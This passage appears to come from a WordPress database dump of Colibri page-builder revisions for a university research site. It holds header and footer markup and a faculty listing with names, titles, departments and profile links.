0)\"></path>\n          <path d=\"M371,48.4C242,1.8,242,5.4,184.8,20.6,128,35.8,132.3,44.9,89.9,52.5,28.6,63.7,0,0,0,0V39.8S54.25,76.6,116.06,83.43c28.46,3.15,58.53-.05,85.64-16.13l.84-.49c56.53-33.06,45.18,49.44,148.36.49,11.34-5.38,22.89-10.16,34.52-14.38Q378.34,51,371,48.4Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M978.52,27.44C993.13,32,1000,36.5,1000,36.5V0S996.54,14.27,978.52,27.44Z\" transform=\"translate(0 0)\"></path>\n        </g>\n        <path d=\"M0,0S28.6,63.7,89.9,52.5c42.4-7.6,38.1-16.7,94.9-31.9C242,5.4,242,1.8,371,48.4q7.33,2.61,14.42,4.52c70,18.92,122.41-11.28,192.21-28.7a368.79,368.79,0,0,1,49.81-9.08c38.82-4.21,83.68-2.05,138.66,13.76l5.55,1.59c12.94,3.74,23.74,7,33.47,9.8,34.45,9.83,55.52,13.26,111.28,7.81,30.16-3,49.63-11.54,62.12-20.66C996.54,14.27,1000,0,1000,0Z\"\n          transform=\"translate(0 0)\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"25-h25\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-58 style-local-25-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-59-outer style-local-25-h26-outer\">\n            <div data-colibri-id=\"25-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-59 style-local-25-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"25-h27\" class=\"page-title style-60 style-local-25-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-page-title__outer style-60-outer style-local-25-h27-outer\">\n                    <div class=\"h-global-transition-all\">[colibri_page_title tag=\"h1\"]</div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <!---->\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_post','','inherit','closed','closed','','25-revision-v1','','','2023-10-13 13:07:34','2023-10-13 17:07:34','',25,'https://gsudice.dataconn.net/?p=1818',0,'revision','',0),(1819,1,'2023-10-13 13:07:34','2023-10-13 17:07:34','{\"name\":\"hop-footer\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Footers\",\"attrs\":{\"id\":\"Footers\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-copyright\",\"slot\":null,\"parentId\":\"28-f4\",\"index\":0,\"id\":\"28-f5\",\"partialId\":28,\"styleRef\":270,\"type\":\"footer\"}],\"id\":\"28-f4\",\"parentId\":\"28-f3\",\"partialId\":28,\"styleRef\":269,\"type\":\"footer\"}],\"parentId\":\"28-f2\",\"index\":0,\"id\":\"28-f3\",\"partialId\":28,\"styleRef\":268,\"type\":\"footer\"}],\"id\":\"28-f2\",\"parentId\":\"28-f1\",\"partialId\":28,\"styleRef\":267,\"type\":\"footer\"}],\"id\":\"28-f1\",\"ui\":{\"isSelected\":false,\"isHovered\":false},\"type\":\"footer\",\"partialId\":28,\"styleRef\":266}','','','inherit','closed','closed','','29-revision-v1','','','2023-10-13 13:07:34','2023-10-13 17:07:34','',29,'https://gsudice.dataconn.net/?p=1819',0,'revision','',0),(1820,1,'2023-10-13 13:07:34','2023-10-13 17:07:34','<div data-enabled=\"true\" data-colibri-component=\"footer-parallax\" data-colibri-id=\"28-f1\" class=\"page-footer style-266 style-local-28-f1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"28-f2\" id=\"Footers\" class=\"h-section h-section-global-spacing d-flex align-items-lg-end align-items-md-end align-items-end style-267 style-local-28-f2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"28-f3\" class=\"h-row-container gutters-row-lg-1 gutters-row-md-1 gutters-row-2 gutters-row-v-lg-1 gutters-row-v-md-1 gutters-row-v-2 style-268 style-local-28-f3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-1 gutters-col-md-1 gutters-col-2 gutters-col-v-lg-1 gutters-col-v-md-1 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-269-outer style-local-28-f4-outer\">\n            <div data-colibri-id=\"28-f4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-1 h-px-md-1 h-px-2 v-inner-lg-1 v-inner-md-1 v-inner-2 style-269 style-local-28-f4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"28-f5\" class=\"style-270 style-local-28-f5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all\">[colibri_copyright]© {year} {site-name}. Created for free using WordPress and\n                    <a target=\"_blank\" href=\"https://colibriwp.com\" rel=\"noopener\">Colibri</a>[/colibri_copyright]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','footer_post','','inherit','closed','closed','','28-revision-v1','','','2023-10-13 13:07:34','2023-10-13 17:07:34','',28,'https://gsudice.dataconn.net/?p=1820',0,'revision','',0),(1825,1,'2024-02-23 10:11:20','2024-02-23 15:11:20','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Faculty\",\"attrs\":{\"id\":\"faculty\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c4\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c5\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1697,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c6\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":2,\"id\":\"182-c7\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c8\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=C5PVPkoAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c9\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c10\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c11\",\"partialId\":182,\"styleRef\":978,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-Portrait-1-e1697202215204.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1701,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c12\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Armin Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":2,\"id\":\"182-c13\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p> Chair and Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c14\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=41ckZZsAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c15\",\"partialId\":182,\"styleRef\":979,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c16\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c17\",\"partialId\":182,\"styleRef\":980,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/sunderraman1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":692,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c18\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Raj Sunderraman\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":2,\"id\":\"182-c19\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Chair and Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c20\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/raj-sunderraman-a5591bb2\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/raj-sunderraman\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?hl=en&user=Wlxc9FEAAAAJ\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c21\",\"partialId\":182,\"styleRef\":981,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c22\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c23\",\"partialId\":182,\"styleRef\":982,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-SRM-360x360-1-e1697202435329.png\",\"caption\":{\"text\":\"\"},\"imageId\":1704,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c24\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Susie Ramisetty-Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":2,\"id\":\"182-c25\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Research Associate Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c26\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Population Health Sciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/susie-ramisetty-mikler-7a0b3014\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/publichealth.gsu.edu\\/profile\\/susie-ramisetty-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=KzNVJwIAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354}]},\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c27\",\"partialId\":182,\"styleRef\":983,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c28\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c29\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-zelikovsky.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":704,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c30\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Alex Zelikovsky\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":2,\"id\":\"182-c31\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Distinguished University Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c32\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/alex-zelikovsky-48a2795\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/alex-zelikovsky\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=UzCRNJwAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c33\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c34\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c35\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-bourgeois.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":696,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c36\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Anu Bourgeois\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":2,\"id\":\"182-c37\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c38\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anu-bourgeois-09b7b32b\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/anu-bourgeois\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=qsAUgQ8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c39\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c40\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c41\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/08\\/hu_new-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1348,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c42\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Xiaolin Hu\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":2,\"id\":\"182-c43\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c44\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/csds.gsu.edu\\/profile\\/xiaolin-hu\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=zeU19nAAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c45\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c46\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c47\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-patterson.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1391,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c48\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Murray Patterson\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":2,\"id\":\"182-c49\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Assistant Professor&nbsp;<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c50\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/murray-patterson-449a947\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/murray-patterson\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=X4J8vAEAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c51\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c52\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c53\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Taylor-shelton_300x300.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":705,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c54\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Taylor Shelton\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":2,\"id\":\"182-c55\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Assistant Professor<\\/span><\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c56\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/taylor-shelton-28a4b3291\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/taylor-shelton\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=WFA1Ry8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c57\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c58\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c58\",\"index\":0,\"id\":\"182-c59\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/Hassan-Babaie-300x300-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1634,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c58\",\"index\":0,\"id\":\"182-c60\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Hassan Babaie\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c58\",\"index\":2,\"id\":\"182-c61\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c58\",\"index\":1,\"id\":\"182-c62\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/geosciences.gsu.edu\\/profile\\/hassan-babaie\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.researchgate.net\\/profile\\/Hassan-Babaie\\/4\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c58\",\"index\":1,\"id\":\"182-c63\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c64\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c64\",\"index\":0,\"id\":\"182-c65\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-Faris-e1697216253732.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1814,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c64\",\"index\":0,\"id\":\"182-c66\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Faris Hawamdeh<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c64\",\"index\":2,\"id\":\"182-c67\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Academic 